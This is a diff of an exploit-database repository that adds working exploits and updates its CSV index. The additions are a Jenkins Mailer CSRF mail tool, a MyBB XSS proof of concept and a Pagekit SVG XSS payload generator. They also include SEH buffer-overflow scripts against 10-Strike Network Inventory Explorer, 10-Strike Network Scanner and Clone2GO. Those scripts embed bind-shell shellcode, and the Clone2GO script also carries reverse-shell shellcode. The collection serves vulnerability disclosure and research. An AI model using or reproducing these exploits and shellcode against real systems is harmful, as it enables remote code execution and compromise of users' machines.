url = str(input("Jenkins Server's URL(ex : http://vuln.jenkins.com) : "))
if len(url) <= 0 :
print (" Can't Be Null!")
url_set()
elif url[0:4] != "http" :
print (" URL must start with 'http://' ")
url_set()
else : table['url'] = url
def subject_set() :
subject = str(input ("SUBJECT [Default : Look! Warning with your Jenkins] : "))
if len(subject) <= 0 :
subject = "Look! Waning with your Jenkins"
table['subject'] = subject
def cover_message() :
cover_message = str(input ("Cover Message [Default : Here is your Vulnable!] : "))
if len(cover_message) <= 0 :
cover_message = "Here is your Vulnable!"
table['cover_message'] = cover_message
def sender() :
sender = str(input ("Attacker E-mail(ex : attacker@abcd.com) : "))
if len(sender) <= 0 :
print (" Can't Be Null!")
sender()
else : table['sender'] = sender
def reciver() :
reciver = str(input ("Admin's E-mail(ex : admin@abcd.com) : "))
if len(reciver) <= 0 :
print (" Can't Be Null!")
reciver()
else : table['reciver'] = reciver
def test_email() :
test_email = str(input ("Tester E-mail(ex : tester@abcd.com) : "))
if len(test_email) <= 0 :
print (" Can't Be Null!")
test_email()
table['test_email'] = test_email
def smtp_server() :
smtp_server = str(input ("SMTP_Server [Default : smtp.gmail.com] : "))
if len(smtp_server) <= 0 :
smtp_server = "smtp.gmail.com"
table['smtp_server'] = smtp_server
def l_id() :
l_id = str(input ("Your SMTP_Server ID : "))
if len(l_id) <= 0 :
print (" Can't Be Null!")
l_id()
table['l_id'] = l_id
def l_pw() :
l_pw = str(getpass.getpass("Your SMTP_Server PW : "))
if len(l_pw) <= 0 :
print (" Can't Be Null!")
l_pw()
table['l_pw'] = l_pw
def set_all () :
url_set()
subject_set()
cover_message()
sender()
reciver()
test_email()
smtp_server()
l_id()
l_pw()
print ("Setting Complit! Use 'show' to check options")
set_help = {
'all':"Set all payload",
'help':"Show set commend's help",
'url_set':"Set only 'url_set' payload",
'subject_set':"Set only 'url_set' payload",
'cover_message':"Set only 'cover_message' payload",
'sender':"Set only 'sender' payload",
'reciver':"Set only 'reciver' payload",
'test_email':"Set only 'test_email' payload",
'smtp_server':"Set only 'smtp_server' payload",
'l_id':"Set only 'l_id' payload",
'l_pw':"Set only 'l_pw' payload",
}
def set_select (a) :
if a=="all" : set_all()
elif a=="url_set" : url_set()
elif a=="subject_set" : subject_set()
elif a=="cover_message" : cover_message()
elif a=="sender" : sender()
elif a=="reciver" : reciver()
elif a=="test_email" : test_email()
elif a=="smtp_server" : smtp_server()
elif a=="l_id" : l_id()
elif a=="l_pw" : l_pw()
elif a=="help" :
for i in set_help :
print (" -%-20s %-s" %(i,set_help[i]))
print ('')
while True :
direct = str(input ("CVE-2018-8718 >> ")).lower()
if direct == "help" :
print ("""\
%-10s Show this help menu.
%-10s [-all / -help / -url_set / -subject_set / .... ]
%-10s Set the Payload
%-10s [-all] Show Current Setting.
%-10s Send CSRF use current setting.
""" %("help","set","","show","send"))
elif direct[0:3] == "set" :
if ' -' not in direct :
if direct == "set" :
set_option = ["help"]
else :
print (" Option error \n")
else :
set_option = direct.split(' -')[1:]
okay = 1
if len(set_option) == 1 :
if set_option[0] not in set_help :
print (" Option error \n")
else :
set_select(set_option[0])
elif len(set_option) >= 2 :
for i in set_option :
if i in ['help', 'all'] :
print (" *Option [-help / -all] cannot be use with another options \n")
okay = 0
break
for i in set_option :
if i not in set_help :
print (" Option error \n")
okay = 0
break
if okay == 1 :
for i in set_option :
set_select(i)
elif direct[:4] == "show" :
if " -" not in direct :
if direct == "show" :
for i in table :
if i != "l_pw" :
print (" %-20s %s" %(i,table[i]))
print (" If you want to see l_pw... add [-all] option")
print ("")
else :
print (" Option error \n")
else :
show_option = direct.split(" -")[1:]
if (len(show_option) == 1 and show_option[0] == 'all') :
for i in table :
print (" %-20s %s" %(i,table[i]))
print ()
else :
print (" Option error \n")
elif direct == "send" :
print (" Sending CSRF Mail.....")
try :
send_mail()
print (" Succed!!\n")
except :
print (" Fail....")
elif direct == "exit" :
break
else :
print (" Usage : help\n")

25
exploits/php/webapps/44833.txt Normal file
View file

@ -0,0 +1,25 @@
# Exploit Title: MyBB Recent Threads Plugin v1.0 - Cross-Site Scripting
# Date: 6/2/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=842
# Version: 1.0
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-11715
1. Description:
Creates a page that shows threads that the user has posted in when they have unread replies.
2. Proof of Concept:
- Create or reply to a thread with the following subject <script>alert('XSS')</script>
- When someone replies to the thread you will see the alert here /misc.php?action=myrecentthreads
3. Solution:
Update to 1.1

33
exploits/php/webapps/44837.py Executable file
View file

@ -0,0 +1,33 @@
# Title: Pagekit < 1.0.13 - Cross-Site Scripting Code Generator
# Author : DEEPIN2
# Date: 2018-06-05
# Vendor: Pagekit
# Sotware: https://pagekit.com/
# Version: < 1.0.13
# CVE: 2018-11564
# python3 required
def makesvg(name, code):
code = '<exploit:script xmlns:exploit="http://www.w3.org/1999/xhtml">' + code + '</exploit:script>'
f = open(name, 'w+')
f.write(code)
f.close
if __name__ == '__main__':
print('''
______ _______ ____ ___ _ ___ _ _ ____ __ _ _
/ ___\ \ / / ____| |___ \ / _ \/ |( _ ) / / | ___| / /_ | || |
| | \ \ / /| _| _____ __) | | | | |/ _ \ _____| | |___ \| '_ \| || |_
| |___ \ V / | |__|_____/ __/| |_| | | (_) |_____| | |___) | (_) |__ _|
\____| \_/ |_____| |_____|\___/|_|\___/ |_|_|____/ \___/ |_|
[*] Author : DEEPIN2(Junseo Lee)''')
print('[*] enter name without extension, ex) test.svg -> test')
filename = input('Filename : ') + '.svg'
print('[*] If you want to use alert(), type "alert("bla..bla..")"')
scriptcode = input('Script code : ')
try:
makesvg(filename, scriptcode)
print('[+] Successfully make venom file "%s"' %filename)
except Error as e:
print(e)

34
exploits/windows/local/44834.py Executable file
View file

@ -0,0 +1,34 @@
#!/usr/bin/python
#----------------------------------------------------------------------------------------------------------------------#
# Exploit Title : Clone 2 GO Video converter 2.8.2 Unicode Buffer Overflow (Remote Code Execution) #
# Exploit Author : Gokul Babu #
# Organisation : Arridae Infosec P.V Ltd #
# Vendor Homepage : http://www.clone2go.com/products/videoconverter.php #
# Vulnerable Software: http://www.clone2go.com/down/video-converter-setup.exe #
# Tested on : Windows-7 64-bit(eip-828)(Other windows versions also vulnerable Only Eip overwrite will change #
# Steps to reproduce : Open the evil.txt paste the contents in Options -> Set output folder -> Browse #
#----------------------------------------------------------------------------------------------------------------------#
#payload generation method
#msfpayload windows/exec CMD=calc.exe R > calc.raw
#./alpha2 eax --unicode --uppercase < calc.raw
#seh-"004d00b3"
#\x73-venetian pad(other things didn't work)
#248 bytes of padding before shellcode is required which is 124 bytes in Unicode
#EAX register is used for operation
seh= "\x41\x73" + "\xb3\x4d"
operation="\x73\x53\x73\x58\x73\x05\x0b\x01\x73\x2d\x02\x01\x73\x50\x73\xc3" + "\x90"*124
shellcode=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLK83YKPKPKPS0TIYUNQ8RC4TKPRP0TK0RLL4KPRLT4KRRNHLOWGPJMVNQKO01GP6LOLQQCLM2NLMPWQXOLMKQ97IRL0PR0W4K22LP4KOROLKQ8P4KOP2XU5WP2TPJKQXPPPDKPHMHTK28MPKQXSK3OLOYTKP4TKKQXVNQKONQWP6LY1XOLMKQWW08K0RUL4M3SMZXOK3MNDBUIRQH4KB8MTKQXSBFDKLLPKTK0XMLM1IC4KKTDKM1HPSY14MTNDQKQKQQ0YPZR1KOIPQHQO1J4KLRJKE6QMRJKQTMU5VYKPM0M0PPS801TKROTGKOJ57KJP7EUR1FQXW6TUGM5MKOXUOLLFSLLJSPKK9P2UM57KOWN3T2BOBJKP1CKO8UQSC1RL2CKPA")
#msfpayload windows/shell_reverse_tcp LHOST=172.20.10.3 LPORT=4444 R > reverse.raw
#./alpha2 eax --unicode --uppercase < reverse.raw
reverse=("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKL9X3YM0KPKPQPTIYUNQYBQTDKR2NPTKPRLL4KQBMDTKBRMXLOVWOZMVP1KONQWP6LOLQQSLKRNLMPWQXOLMM1Y7YRL022B7TKPRLPDKOROLKQHPDKOP2XCUY044OZKQJ00PTKOXN84KPXMPKQ9CK3OLQ9TKNT4KKQZ6P1KONQ7P6LWQHOLMKQ97OHIPBUJTM3SMKHOK3MNDRUK2R84KQHNDKQZ3S64KLL0KTKR8MLKQICTKM44KKQHPDIOTO4O4QKQK1Q0YPZPQKOK0QH1O1JTKLRZKDF1MS8NSNRKPKP1XT7BSNR1O0TQXPLCGMVKWKO8UFX4PKQKPKPMY940TPPBHO9502KKPKO9EPP0P20PPOPR0OP0P1XJJLO9O9PKO8UTIXGRH6LN4LJLCQXLBM0LQQLDI9VQZLPPVPW1XTYEUT4QQKOJ5BHQSBMQTM0U9JCR7270WP1JV1ZMBPYR6YRKM1VY7PDNDOLKQM1TMOTO4LPGVKPQ4PTPPB6PVPVOVB60NPVPV0SPVRH2Y8LOO3VKO9ESYK00NR6OVKO00S8LHDGMMQPKOXUGKJPVUVBPVRH76TUWMUMKOJ5OLKVSLLJ3PKKYPT5KUWKOWMCRRRO1ZKPPSKOZ5A")
buf="A"*828 + seh + operation + shellcode + "D"*(4164-len(operation) -len(shellcode))
f=open("evil.txt","w")
f.write(buf)
f.close()

75
exploits/windows_x86/local/44838.py Executable file
View file

@ -0,0 +1,75 @@
# Exploit Title : 10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)
# Exploit Author : Hashim Jawad - ihack4falafel
# Vendor Homepage : https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on : Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Computers tab click on 'From Text File'
# - Open Evil.txt and boom!
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - Next SEH offset is 211 bytes but for some reason passing the exception to the program will result in shifting
# the stack by 8 bytes, see buffer for reference.
# - Keep in mind the exploit is contingent on path, and as such you need to make sure offsets stay intact based on
# your username, the following is the path used while developing the exploit (default on Windows 7):
# [C:\Users\IEUser\AppData\Roaming\10-strike\Network Inventory\cfg\]
# - Pro edition is effected as well.
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x3a\x5c' -f python -v shellcode
#Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xba\x58\x39\xb1\xae\xd9\xcf\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x53\x83\xef\xfc\x31\x57\x0e\x03\x0f"
shellcode += "\x37\x53\x5b\x53\xaf\x11\xa4\xab\x30\x76\x2c\x4e"
shellcode += "\x01\xb6\x4a\x1b\x32\x06\x18\x49\xbf\xed\x4c\x79"
shellcode += "\x34\x83\x58\x8e\xfd\x2e\xbf\xa1\xfe\x03\x83\xa0"
shellcode += "\x7c\x5e\xd0\x02\xbc\x91\x25\x43\xf9\xcc\xc4\x11"
shellcode += "\x52\x9a\x7b\x85\xd7\xd6\x47\x2e\xab\xf7\xcf\xd3"
shellcode += "\x7c\xf9\xfe\x42\xf6\xa0\x20\x65\xdb\xd8\x68\x7d"
shellcode += "\x38\xe4\x23\xf6\x8a\x92\xb5\xde\xc2\x5b\x19\x1f"
shellcode += "\xeb\xa9\x63\x58\xcc\x51\x16\x90\x2e\xef\x21\x67"
shellcode += "\x4c\x2b\xa7\x73\xf6\xb8\x1f\x5f\x06\x6c\xf9\x14"
shellcode += "\x04\xd9\x8d\x72\x09\xdc\x42\x09\x35\x55\x65\xdd"
shellcode += "\xbf\x2d\x42\xf9\xe4\xf6\xeb\x58\x41\x58\x13\xba"
shellcode += "\x2a\x05\xb1\xb1\xc7\x52\xc8\x98\x8f\x97\xe1\x22"
shellcode += "\x50\xb0\x72\x51\x62\x1f\x29\xfd\xce\xe8\xf7\xfa"
shellcode += "\x31\xc3\x40\x94\xcf\xec\xb0\xbd\x0b\xb8\xe0\xd5"
shellcode += "\xba\xc1\x6a\x25\x42\x14\x06\x2d\xe5\xc7\x35\xd0"
shellcode += "\x55\xb8\xf9\x7a\x3e\xd2\xf5\xa5\x5e\xdd\xdf\xce"
shellcode += "\xf7\x20\xe0\xe1\x5b\xac\x06\x6b\x74\xf8\x91\x03"
shellcode += "\xb6\xdf\x29\xb4\xc9\x35\x02\x52\x81\x5f\x95\x5d"
shellcode += "\x12\x4a\xb1\xc9\x99\x99\x05\xe8\x9d\xb7\x2d\x7d"
shellcode += "\x09\x4d\xbc\xcc\xab\x52\x95\xa6\x48\xc0\x72\x36"
shellcode += "\x06\xf9\x2c\x61\x4f\xcf\x24\xe7\x7d\x76\x9f\x15"
shellcode += "\x7c\xee\xd8\x9d\x5b\xd3\xe7\x1c\x29\x6f\xcc\x0e"
shellcode += "\xf7\x70\x48\x7a\xa7\x26\x06\xd4\x01\x91\xe8\x8e"
shellcode += "\xdb\x4e\xa3\x46\x9d\xbc\x74\x10\xa2\xe8\x02\xfc"
shellcode += "\x13\x45\x53\x03\x9b\x01\x53\x7c\xc1\xb1\x9c\x57"
shellcode += "\x41\xc1\xd6\xf5\xe0\x4a\xbf\x6c\xb1\x16\x40\x5b"
shellcode += "\xf6\x2e\xc3\x69\x87\xd4\xdb\x18\x82\x91\x5b\xf1"
shellcode += "\xfe\x8a\x09\xf5\xad\xab\x1b"
buffer = '\x41' * 207 filler to nSEH offset (211-4)
buffer += '\x9f\x4e\xe9\x61' 0x61E94E9F [sqlite3.dll] | jmp esp
buffer += '\x90\x90\x90\x90' nSEH
buffer += '\x90\x90\x90\x90' SEH
buffer += shellcode bind shell
buffer += '\xcc' * (3000-207-12-len(shellcode)) junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e

71
exploits/windows_x86/local/44840.py Executable file
View file

@ -0,0 +1,71 @@
# Exploit Title: 10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafelx
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Tested on: Windows 7 Enterprise - SP1 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Under Help, click 'Enter Registration Key'.
# - Paste the contents of Evil.txt and click OK.
# Notes:
# - The following modules have no protection making the exploit universal: [sqlite3.dll, ssleay32.dll, MSVCR71.dll]
# - There is ample space prior to SEH overwrite.
# - Pro edition is effected as well.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -f python -v shellcode
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xbf\xad\xa8\x1e\x44\xdd\xc0\xd9\x74\x24\xf4\x5e"
shellcode += "\x2b\xc9\xb1\x53\x83\xc6\x04\x31\x7e\x0e\x03\xd3"
shellcode += "\xa6\xfc\xb1\xd7\x5f\x82\x3a\x27\xa0\xe3\xb3\xc2"
shellcode += "\x91\x23\xa7\x87\x82\x93\xa3\xc5\x2e\x5f\xe1\xfd"
shellcode += "\xa5\x2d\x2e\xf2\x0e\x9b\x08\x3d\x8e\xb0\x69\x5c"
shellcode += "\x0c\xcb\xbd\xbe\x2d\x04\xb0\xbf\x6a\x79\x39\xed"
shellcode += "\x23\xf5\xec\x01\x47\x43\x2d\xaa\x1b\x45\x35\x4f"
shellcode += "\xeb\x64\x14\xde\x67\x3f\xb6\xe1\xa4\x4b\xff\xf9"
shellcode += "\xa9\x76\x49\x72\x19\x0c\x48\x52\x53\xed\xe7\x9b"
shellcode += "\x5b\x1c\xf9\xdc\x5c\xff\x8c\x14\x9f\x82\x96\xe3"
shellcode += "\xdd\x58\x12\xf7\x46\x2a\x84\xd3\x77\xff\x53\x90"
shellcode += "\x74\xb4\x10\xfe\x98\x4b\xf4\x75\xa4\xc0\xfb\x59"
shellcode += "\x2c\x92\xdf\x7d\x74\x40\x41\x24\xd0\x27\x7e\x36"
shellcode += "\xbb\x98\xda\x3d\x56\xcc\x56\x1c\x3f\x21\x5b\x9e"
shellcode += "\xbf\x2d\xec\xed\x8d\xf2\x46\x79\xbe\x7b\x41\x7e"
shellcode += "\xc1\x51\x35\x10\x3c\x5a\x46\x39\xfb\x0e\x16\x51"
shellcode += "\x2a\x2f\xfd\xa1\xd3\xfa\x68\xa9\x72\x55\x8f\x54"
shellcode += "\xc4\x05\x0f\xf6\xad\x4f\x80\x29\xcd\x6f\x4a\x42"
shellcode += "\x66\x92\x75\x7d\x2b\x1b\x93\x17\xc3\x4d\x0b\x8f"
shellcode += "\x21\xaa\x84\x28\x59\x98\xbc\xde\x12\xca\x7b\xe1"
shellcode += "\xa2\xd8\x2b\x75\x29\x0f\xe8\x64\x2e\x1a\x58\xf1"
shellcode += "\xb9\xd0\x09\xb0\x58\xe4\x03\x22\xf8\x77\xc8\xb2"
shellcode += "\x77\x64\x47\xe5\xd0\x5a\x9e\x63\xcd\xc5\x08\x91"
shellcode += "\x0c\x93\x73\x11\xcb\x60\x7d\x98\x9e\xdd\x59\x8a"
shellcode += "\x66\xdd\xe5\xfe\x36\x88\xb3\xa8\xf0\x62\x72\x02"
shellcode += "\xab\xd9\xdc\xc2\x2a\x12\xdf\x94\x32\x7f\xa9\x78"
shellcode += "\x82\xd6\xec\x87\x2b\xbf\xf8\xf0\x51\x5f\x06\x2b"
shellcode += "\xd2\x6f\x4d\x71\x73\xf8\x08\xe0\xc1\x65\xab\xdf"
shellcode += "\x06\x90\x28\xd5\xf6\x67\x30\x9c\xf3\x2c\xf6\x4d"
shellcode += "\x8e\x3d\x93\x71\x3d\x3d\xb6"
buffer = '\x41' * 4188 # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x7a\x49\xe8\x61' # SEH | 0x61e8497a : pop esi # pop edi # ret | [sqlite3.dll]
buffer += '\x90' * 8 # nops
buffer += shellcode # bind shell
buffer += '\x41' * (5000-4188-16-len(shellcode)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e

85
exploits/windows_x86/local/44841.py Executable file
View file

@ -0,0 +1,85 @@
# Exploit Title: 10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)
# Exploit Author: Hashim Jawad - ihack4falafel
# Date: 2018-06-05
# Vendor Homepage: https://www.10-strike.com/
# Vulnerable Software: https://www.10-strike.com/network-scanner/network-scanner.exe
# Tested on: Windows XP Professional - SP3 (x86)
# Disclosure Timeline:
# 06-02-18: Contacted vendor, no response
# 06-03-18: Contacted vendor, no response
# 06-04-18: Contacted vendor, no response
# 06-05-18: Proof of concept exploit published
# Steps to reproduce:
# - Copy contents of Evil.txt and paste in 'Host name or address' field under Add host.
# - Right-click on newly created host and click 'Trace route...'.
# - Repeat the second step and boom.
# Notes:
# - '\x00' get converted to '\x20' by the program eliminating the possibility of using [pop, pop, retn] pointers in base binary.
# - All loaded modules are compiled with /SafeSEH.
# - Right-click on newly created host and click 'System information>General' is effected by the same vulnerability with different
# offsets and buffer size.
# - root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d' -v shellcode -f python
# - Payload size: 355 bytes
#!/usr/bin/python
shellcode = ""
shellcode += "\xb8\x2b\x29\xa7\x48\xd9\xe8\xd9\x74\x24\xf4\x5b"
shellcode += "\x29\xc9\xb1\x53\x31\x43\x12\x03\x43\x12\x83\xc0"
shellcode += "\xd5\x45\xbd\xea\xce\x08\x3e\x12\x0f\x6d\xb6\xf7"
shellcode += "\x3e\xad\xac\x7c\x10\x1d\xa6\xd0\x9d\xd6\xea\xc0"
shellcode += "\x16\x9a\x22\xe7\x9f\x11\x15\xc6\x20\x09\x65\x49"
shellcode += "\xa3\x50\xba\xa9\x9a\x9a\xcf\xa8\xdb\xc7\x22\xf8"
shellcode += "\xb4\x8c\x91\xec\xb1\xd9\x29\x87\x8a\xcc\x29\x74"
shellcode += "\x5a\xee\x18\x2b\xd0\xa9\xba\xca\x35\xc2\xf2\xd4"
shellcode += "\x5a\xef\x4d\x6f\xa8\x9b\x4f\xb9\xe0\x64\xe3\x84"
shellcode += "\xcc\x96\xfd\xc1\xeb\x48\x88\x3b\x08\xf4\x8b\xf8"
shellcode += "\x72\x22\x19\x1a\xd4\xa1\xb9\xc6\xe4\x66\x5f\x8d"
shellcode += "\xeb\xc3\x2b\xc9\xef\xd2\xf8\x62\x0b\x5e\xff\xa4"
shellcode += "\x9d\x24\x24\x60\xc5\xff\x45\x31\xa3\xae\x7a\x21"
shellcode += "\x0c\x0e\xdf\x2a\xa1\x5b\x52\x71\xae\xa8\x5f\x89"
shellcode += "\x2e\xa7\xe8\xfa\x1c\x68\x43\x94\x2c\xe1\x4d\x63"
shellcode += "\x52\xd8\x2a\xfb\xad\xe3\x4a\xd2\x69\xb7\x1a\x4c"
shellcode += "\x5b\xb8\xf0\x8c\x64\x6d\x6c\x84\xc3\xde\x93\x69"
shellcode += "\xb3\x8e\x13\xc1\x5c\xc5\x9b\x3e\x7c\xe6\x71\x57"
shellcode += "\x15\x1b\x7a\x46\xba\x92\x9c\x02\x52\xf3\x37\xba"
shellcode += "\x90\x20\x80\x5d\xea\x02\xb8\xc9\xa3\x44\x7f\xf6"
shellcode += "\x33\x43\xd7\x60\xb8\x80\xe3\x91\xbf\x8c\x43\xc6"
shellcode += "\x28\x5a\x02\xa5\xc9\x5b\x0f\x5d\x69\xc9\xd4\x9d"
shellcode += "\xe4\xf2\x42\xca\xa1\xc5\x9a\x9e\x5f\x7f\x35\xbc"
shellcode += "\x9d\x19\x7e\x04\x7a\xda\x81\x85\x0f\x66\xa6\x95"
shellcode += "\xc9\x67\xe2\xc1\x85\x31\xbc\xbf\x63\xe8\x0e\x69"
shellcode += "\x3a\x47\xd9\xfd\xbb\xab\xda\x7b\xc4\xe1\xac\x63"
shellcode += "\x75\x5c\xe9\x9c\xba\x08\xfd\xe5\xa6\xa8\x02\x3c"
shellcode += "\x63\xd8\x48\x1c\xc2\x71\x15\xf5\x56\x1c\xa6\x20"
shellcode += "\x94\x19\x25\xc0\x65\xde\x35\xa1\x60\x9a\xf1\x5a"
shellcode += "\x19\xb3\x97\x5c\x8e\xb4\xbd"
magic = '\xd9\xee' # fldz
magic += '\xd9\x74\x24\xf4' # fnstenv [esp-0xc]
magic += '\x59' # pop ecx
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x80\xc1\x05' # add cl,0x5
magic += '\x90' # nop
magic += '\xfe\xcd' # dec ch
magic += '\xfe\xcd' # dec ch
magic += '\xff\xe1' # jmp ecx
buffer = '\x90' * 28 # nops
buffer += shellcode # bind shell
buffer += '\xcc' * (516-28-len(shellcode)) # filler to nSEH
buffer += '\x75\x06\x74\x06' # nSEH | jump net
buffer += '\x18\x05\xfc\x7f' # SEH | 0x7ffc0518 : pop edi # pop edi # ret [SafeSEH Bypass]
buffer += '\x90' * 5 # nops
buffer += magic # jump -512
buffer += '\xcc' * (3000-516-4-4-5-len(magic)) # junk
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except Exception as e:
print e

15
files_exploits.csv
View file

@ -5986,6 +5986,7 @@ id,file,description,date,author,type,platform,port
44802,exploits/linux/dos/44802.py,"Siemens SIMATIC S7-300 CPU - Remote Denial of Service",2018-05-30,t4rkd3vilz,dos,linux,
44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows,
44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9756,7 +9757,12 @@ id,file,description,date,author,type,platform,port
44819,exploits/hardware/local/44819.js,"Sony Playstation 4 (PS4) 5.1 - Kernel (PoC)",2018-05-28,qwertyoruiop,local,hardware,
44820,exploits/hardware/local/44820.txt,"Sony Playstation 3 (PS3) 4.82 - 'Jailbreak' (ROP)",2018-01-28,PS3Xploit,local,hardware,
44828,exploits/windows/local/44828.py,"Zip-n-Go 4.9 - Buffer Overflow (SEH)",2018-06-04,"Hashim Jawad",local,windows,
44830,exploits/windows/local/44830.rb,"Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
44830,exploits/windows/local/44830.rb,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (Metasploit)",2018-06-04,Metasploit,local,windows,
44834,exploits/windows/local/44834.py,"Clone2GO Video converter 2.8.2 - Buffer Overflow",2018-06-05,"Gokul Babu",local,windows,
44838,exploits/windows_x86/local/44838.py,"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44840,exploits/windows_x86/local/44840.py,"10-Strike Network Inventory Explorer 8.54 - 'Registration Key' Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44841,exploits/windows_x86/local/44841.py,"10-Strike Network Scanner 3.0 - Local Buffer Overflow (SEH)",2018-06-05,"Hashim Jawad",local,windows_x86,
44842,exploits/linux/local/44842.txt,"WebKitGTK+ < 2.21.3 - Crash (PoC)",2018-06-05,"Dhiraj Mishra",local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16543,6 +16549,7 @@ id,file,description,date,author,type,platform,port
44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
44822,exploits/linux/remote/44822.txt,"Git < 2.17.1 - Remote Code Execution",2018-06-01,JameelNabbo,remote,linux,
44829,exploits/linux/remote/44829.py,"CyberArk < 10 - Memory Disclosure",2018-06-04,"Thomas Zuk",remote,linux,
44836,exploits/ios/remote/44836.rb,"WebKit - not_number defineProperties UAF (Metasploit)",2018-06-05,Metasploit,remote,ios,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39495,4 +39502,8 @@ id,file,description,date,author,type,platform,port
44825,exploits/php/webapps/44825.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery / Remote Code Execution",2018-06-03,xichao,webapps,php,
44826,exploits/php/webapps/44826.html,"GreenCMS 2.3.0603 - Cross-Site Request Forgery (Add Admin)",2018-06-03,xichao,webapps,php,
44827,exploits/java/webapps/44827.txt,"SearchBlox 8.6.7 - XML External Entity Injection",2018-06-04,"Ahmet Gurel",webapps,java,
44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Reflected Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
44831,exploits/aspx/webapps/44831.txt,"EMS Master Calendar < 8.0.0.20180520 - Cross-Site Scripting",2018-06-04,"Chris Barretto",webapps,aspx,
44833,exploits/php/webapps/44833.txt,"MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting",2018-06-05,0xB9,webapps,php,
44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php,
44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware,
44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux,

Can't render this file because it is too large.